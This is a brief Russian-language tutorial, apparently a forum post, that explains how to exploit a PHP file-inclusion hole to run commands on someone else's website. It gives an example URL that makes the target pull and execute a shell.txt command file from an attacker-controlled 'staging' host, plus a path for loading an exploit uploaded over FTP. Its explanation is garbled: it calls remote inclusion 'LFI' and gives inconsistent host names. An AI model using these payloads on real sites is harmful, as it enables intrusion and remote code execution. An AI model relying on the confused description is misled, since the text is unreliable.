LFI (Local File Inclusion) — уязвимость, позволяющая выполнить сторонний код, загрузить экслойт или выполнить любую другую вредоносную функцию.
Данная уязвимость также известна как PHP-инъекция. Суть её заключается в том, что посредством какого либо параметра заменяется его значение.
Положим, что у нас есть некий сайт по адресу hex.onioncom, на котором возможно PHP-инъекция, и поставлена цель использовать данную уязвимость. Однако, понадобится второй ресурс, нечто похожее на плацдарм. Сей плацдарм располагается по адресу sohex.onioncom. Для того, чтобы выполнить производный код на уязвимом сайте, необходимо создать файл на плацдарме с набором команд. Выглядеть сие будет примерно таким образом:
https://hex.com/index.php?random=https://sohex.com/shell.txt?
Исходя из всего этого, все команды из файла shell.txt
будут выполнены на уязвимом сайте.
Также подобным методом вполне возможна загрузка эксплойта посредством FTP:
https://hex.com/index.php?random=C:\\ftp\\upload\\exploit
.
Надеюсь, я сумел хоть малейшим образом помочь Вам.
С уважением.